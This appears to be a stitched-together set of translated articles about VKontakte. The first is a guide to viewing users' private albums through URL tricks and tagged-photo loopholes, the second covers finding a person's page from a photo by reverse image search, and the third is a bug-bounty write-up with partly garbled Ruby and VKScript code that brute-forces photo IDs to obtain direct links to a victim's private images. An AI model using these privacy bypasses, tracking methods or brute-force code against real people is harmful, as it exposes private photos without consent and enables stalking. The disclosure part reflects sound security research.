It often happens that you desperately need to look at photos of a private VK profile. As you know, any user has the opportunity to independently choose the privacy level of their profile, so closing an entire album or individual photos is a matter of a few clicks. It turns out that you can look at closed photos! There are certain tricks and “holes”, one of which we will tell you about today.

Keep in mind that they all close quickly, so it’s not a fact that this, like any other method, will be valid in a week or month.

You will need:

Opening the source code

First, try it. If the albums do not open, then proceed as follows. So, open the profile of the person whose photos we want to see. Next, we need to open the source code of this page.

To do this, right-click on a free area, and in the context menu look for the item “View page source code”, “View element code”, or the like. You can also use the F12 key if you have Google Chrome. So, here is the source code of the page. What's next?

Looking for the required fragment

Using the Ctrl+F key combination, open the search bar and enter the word “albums” there.

There will be several results, but we need the one followed by numbers (this is the profile ID). As a rule, this fragment will be the third from the beginning in the search results. Found it? Great, copy them using the Ctrl+C key combination.

Working with the address bar

So, we have the necessary code fragment. What's next? In order to view hidden photos in Contact, return to the required page (we no longer need the page with the source code).

In the address bar of the browser we see a link like vk.com/id#####, where #### is the page ID. You should know and friends. We place the cursor at the end of the address bar and enter the following characters into it: “?z=”, after which we copy here the fragment from the source code of the page that we were looking for.

As a result, the address bar of the browser should contain the following: vk.com/id####?z=albums####, where #### is the person’s ID.

We press Enter, and all the photographs of the person open in front of us.

In this simple way, you can look at photos in a closed album in VKontakte, and also see a list of albums of those people who have left VKontakte friends or unknown users.

Frequently asked questions and answers

How to view a VK user’s private album via phone?

Instructions for viewing are the same as for viewing from a computer.

What are the hidden possibilities of VKontakte?

1. If you go to the “Settings” section and in the “General” tab change the language to pre-revolutionary or Soviet, the VKontakte interface will change slightly.
2. If you want some information about you to remain empty on your personal page, then add a code in such fields.
3. You can make an active link to any VKontakte group in the “Place of work” column. To do this, go to the "Edit" section, select the "Career" tab and in the "Place of work" section write the name of the community you are a member of.
4. In the "Settings" section, the id can be changed to a short and memorable address.

What service is there to view hidden photos in contacts?

You need to find a photo of the person in which he is tagged, then go to fast view and scroll through the photo. Despite the fact that regular access to them is closed, you can view them. The technical service is not yet able to eliminate this “hole”.

How to view a private VK account?

To view a private profile you need:
1. Find out the profile ID. hover the mouse over “Friends NAME”. Copy the link.
2. *[link blocked by decision of the project administration].
3. The numbers after "id=" are the profile ID.
We copy these numbers and paste them into the necessary links.

Who can see photos on VKontakte?

Depending on who you gave access to your photos.

How to see all photos in contact?

This information is described in the article.

How to see a photo of a group in VKontakte?

Find a group or page that matches your interests, then select the option just below the “Communities” search bar. Then a little to the right you will see “Community Type” (check the box next to: any, group, page, meeting) and click search. A list of groups will open in which you can select the ones that suit you. If the group is open, you can easily view all its contents: audio, video, photos, discussions.
If you are on a closed group page, pay attention to the upper right corner under the photo. It will say: “Subscribe” (to the page) or “Submit an application” (to the group).
Please wait a while as your application is being reviewed by the group administrators. If they approve, the group will appear in the list on your page. You can now view all group content.

Hello, friends! Today we will be searching for people using photos on the VKontakte social network. Just imagine that we only have a photograph, and from this photo we need to find his page. Perhaps this will only happen if he uploaded this photo to a social network and did not hide it (). This can be done, I tested it in practice, there are a couple of proven methods and now we will look at them.

Search by photos on VKontakte

To use this function of a social network and find a person, we first need to upload a photo, which we will use to search for our account (). Now we go to the album to which we added this photo and click on the photo itself so that it is fully loaded.

After the photo is loaded, look at the address bar of the browser and copy the address of the photo. You do not need to copy the entire photo address, but only those numbers that come after the word photo (along with it) and before the % sign. Look at the screenshot and everything will become clear:

Now go to your home page and click on the “News” menu item

Almost at the very top of the page that opens, above the news, we have a photo search window. We insert the word copy into it: immediately after it is the address of the photo that you uploaded and by which you need to find the person.

See screenshot:

Click on Enter. And we load all the exact same photos uploaded to the social network by different users. Naturally, if the photo is unique, then in your case there will be only one such user. All you have to do is click on the photo and follow the link to the owner of this photo:

That's all, we have completed the task.

Search by images from Yandex

Now, for general development, I will show you another way to find a person on VKontakte by photo. But note that it will only work if the user has uploaded it to their profile picture. We will talk about searching by images from the Yandex search engine.

In the next window, click on the “Select file” button to upload the photo to the system for search.

Through Explorer, find the desired image on your computer, select it and click “Open”.

The system will show your picture and below all similar ones that it could find. With a high degree of probability, the first one will be a photo exactly similar to yours.

Scroll below and see a list of sites where the picture appears. Choose any of the proposed ones. In the example, I chose poisksocial.ru. Right-click on the title and select “Open link in new tab” from the list.

On the site that opens, you can search for a person on any of the social networks that are in the list on the left. We have already selected VKontakte and indicated the full name for which the results are displayed (by the way, I did not enter them, they were already registered when I opened the site. Although I am looking for a person with a different full name, for the purity of the experiment I did not change anything).

The window in the middle displays all available, suitable user pages. We scroll through them and yes, the person I need is there, and his avatar has the photo that I used to search.

Click on the name and on the next page select any photo from the photo gallery. The VKontakte page of the found user will open and you can assume that you have found him.

Google Image Search

The Google search engine has exactly the same service as Yandex. Let's also try to find my VKontakte page from the photo that is on my avatar.

Go to the Google home page and in the upper right corner click on the “Pictures” link:

We open the image search service, move the cursor to the right corner of the search bar and click on the camera icon. This button is called “Search by image”.

In the window that opens, go to the “Upload file” tab and click on the “Select file” button:

We upload the photo by which we want to search for a VKontakte account and observe the results.

I got queries related to formal clothing (since the photo shows people in black and white). And there was nothing in “Similar Images”.

If this is the case for you, let's refine the search a little. To do this, you need to enter the first and last name of the person you are looking for in the appropriate line (it is advisable that they coincide with how the user is subscribed to VK) and click on the magnifying glass.

As you can see, my VKontakte page has been found again, which means that we have reached our goal again. And with this I finish this article, in which we learned how to search for VK pages using photographs.

tl;dr

A vulnerability was discovered in VK bookmarks, which made it possible to receive direct links to private photos from personal messages and albums of any user/group. A script was written that sorted through user photos for a certain period and then, through this vulnerability, received direct links to the images. In short, you could get all your photos from yesterday in 1 minute, all photos uploaded last week in 7 minutes, last month in 20 minutes, last year in 2 hours. The vulnerability has now been fixed. The VKontakte administration paid a reward of 10k votes.

When a link is added, the server parses it, tries to find out what entity it refers to and retrieves information about this object from the database. Typically, when writing this kind of function with many conditions, the likelihood that the developer will forget something is very high. So I couldn't afford to pass it up and decided to take a few minutes to experiment a little.

As a result, I managed to find something. By adding a link to a photo, note or video that is not accessible, you could get a little private information about the object. In the case of photos and videos, this is a small (150x150) preview, on which it is quite difficult to see anything; the title was displayed for private notes. Via API method fave.getLinks It was possible to get links to the image, but again the size was too small (75px and 130px). So, essentially, nothing serious.

I decided to go to the mobile version of the site to check if everything was displayed there the same as in the regular version. Looking at the page code, I saw this:

Yes! In the attribute value data-src_big there was a direct link to the original image!

Thus, it was possible to get a direct link to any image on VKontakte, regardless of where it was uploaded and what privacy settings it had. This could be an image from personal messages or a photo from the private albums of any user/group.

It would seem that I could stop there and write to the developers, but I wondered if it was possible, by exploiting this vulnerability, to gain access to all (or downloaded in a certain period of time) photos of the user. The main problem here, as you understand, was that the link to a private photo of the form is not always known photoXXXXXX_XXXXXXXX to add to your bookmarks. The thought of searching through the id of the photo came to mind, but for some reason I immediately rejected it as crazy. I checked the photo-related methods in the API, looked at how the application works with albums, but I couldn’t find any leaks that could help me get a list with the IDs of all the user’s private photos. I was about to give up on this idea, but looking again at the link with the photo, I suddenly realized that going overboard was a good idea.

How photos work in VK

Alas, after spending two hours experimenting, I still didn’t understand this. In 2012, at HighLoad++, Oleg Illarionov said a few words about how they store photos, about horizontal sharding and random selection of a server for uploading, but this information did not give me anything, since there is no connection between the server id and the photo id. It is clear that there is some kind of global counter, but there is some other logic there... Because if the second number were formed using ordinary auto-increment, then the values ​​of photo IDs would have long ago reached huge values ​​(for Facebook, for example, at the moment it is ~ 700 trillion), but for Vkontakte this value is only ~400 million (although, judging by statistics, daily users upload more than 30 million photos). Those. It is clear that this figure is not unique, but at the same time it is not random. I wrote a script that went through the photographs of “old” users and, using the data received, made a graph of how much this figure changed with each year:

It can be seen that the values ​​fluctuate depending on some factors (number of servers or new logic?). But the point is that they are small enough (especially in the last 2-3 years) and it is very easy to calculate the id range for the desired time period. That is, to find out direct links to a user’s photos, say, from last year, you need to try to bookmark only 30 million (from _320000000 to _350000000) different variations of links! Below I have described a brute force technique that allowed me to do this in a matter of minutes.

Going through the photos

Speed ​​up the search x25

Var start = parseInt(Args.start); var end = parseInt(Args.end); var victimId = Args.id; var link = "http://vk.com/photo" + victimId + "_"; while(start != end) ( API.fave.addLink(( "link": link + start )); start = start + 1; );
Thus, it was possible to increase the brute force speed to 3*25 bookmarks/sec. Over the past year, it would have taken a long time to sort through photographs, but for short periods this sorting method was already pretty good.

Speed ​​up the search x25 * number of parallel requests per second

First we needed to find (or create) the required number of applications. A script was written that searches for standalone applications in a given range of application identifiers:

Class StandaloneAppsFinder attr_reader:app_ids def initialize(params) @range = params[:in_range] @app_ids = end def search (@range).each do |app_id|<< app_id if standalone?(app) end end private def standalone?(app_data) app_data["type"] == "standalone" end end
response = open("https://api.vk.com/method/apps.get?app_id=#(app_id)").read app = JSON.parse(response)["response"] app_ids

It was also possible to select applications by the number of users in order to further speed up the search:

Ok, the applications have been found, now they need to give permission to our user’s data and receive tokens. For authorization we had to use the Implicit Flow mechanism. I had to parse the authorization URL from the OAuth dialog and pull out the token after the redirect. This class requires cookies to function. p,l(login.vk.com) and remixsid(vk.com):

Class Authenticator attr_reader:access_tokens def initialize(cookie_header) @cookies = ( "Cookie" => cookie_header ) @access_tokens = end def authorize_apps(apps) apps.each do |app_id|<< extract_token_from(redirect_url) end end private def extract_auth_url_from(oauth_page_html) Nokogiri::HTML(oauth_page_html).css("form").attr("action").value end def extract_token_from(url) URI(url).fragment end def oauth_page(app_id) open(oauth_page_url(app_id), @cookies).read end def oauth_page_url(app_id) "https://oauth.vk.com/authorize?" + "client_id=#{app_id}&" + "response_type=token&" + "display=mobile&" + "scope=474367" end end
auth_url = extract_auth_url_from(oauth_page(app_id)) redirect_url = open(auth_url, @cookies).base_uri.to_s access_tokens

The number of applications found equals the number of parallel requests. To parallelize this whole thing, it was decided to use the Typhoeus gem, which has proven itself in other tasks. The result is a small brute forcer like this:<<-VKScript var start = #{photo_id}; var end = #{photo_id + 25}; var link = "http://vk.com/photo#{@victim_id}" + "_"; while(start != end) { API.fave.addLink({ "link": link + start }); start = start + 1; }; return start; VKScript end end
Class PhotosBruteforcer PHOTOS_ID_BY_PERIOD = ( "today" => 366300000..366500000, "yesterday" => 366050000..366300000, "current_month" => 365000000..366500000, "last_month" => 3600000 00..365000000, "current_year" => 350000000..366500000, "last_year" => 320000000..350000000 ) def initialize(params) @victim_id = params[:victim_id] @period = PHOTOS_ID_BY_PERIOD] end def run(tokens) hydra = Typhoeus::Hydra.new tokensIterator = 0 (@period).step(25) do |photo_id| url = "https://api.vk.com/method/execute?access_token=#(tokens)&code=#(vkscript(photo_id))" encoded_url = URI.escape(url).gsub("+", "% 2B").delete("\n") tokensIterator = tokensIterator == tokens.count - 1 ? 0: tokensIterator + 1 hydra.queue Typhoeus::Request.new encoded_url hydra.run if tokensIterator.zero? end hydra.run unless hydra.queued_requests.count.zero? end private def vkscript(photo_id).

To speed up the brute force even more, there was an attempt to get rid of the unnecessary body in the response, but

Require "nokogiri" require "open-uri" require "typhoeus" require "json" require "./standalone_apps_finder" require "./photos_bruteforcer" require "./authenticator" bruteforcer = PhotosBruteforcer.new(victim_id: ARGV, period: ARGV) apps_finder = StandaloneAppsFinder.new(in_range: 4800000..4800500) apps_finder.search # p,l - cookies from login.vk.com # remixsid - cookie from vk.com authenticator = Authenticator.new("p=;" + "l =;" + "remixsid=;") authenticator.authorize_apps(apps_finder.app_ids) bruteforcer.run(authenticator.access_tokens)
After running the program, the bookmarks contained all the user’s photos for a given period. All that was left was to go to the mobile version of VKontakte, open the browser console, pull out direct links and enjoy the photos in their original size.

Results

The table shows the average time required to try photo IDs over a certain period. I'm sure all this could have been sped up 10-20 times. For example, in a brute force script, make one large queue of all requests and normal synchronization between them, because in my implementation, one request with a timeout will slow down the entire process. And in general, you could just buy a couple of instances on EC2 and get all the photos of any user in an hour. But I already wanted to sleep.

And in general, it doesn’t matter how much time the attacker spends on this, 5 hours or the whole day, because one way or another he will get links to private images. The ability to securely gain access to private information in a finite amount of time is the main threat posed by this vulnerability.

Reporting a vulnerability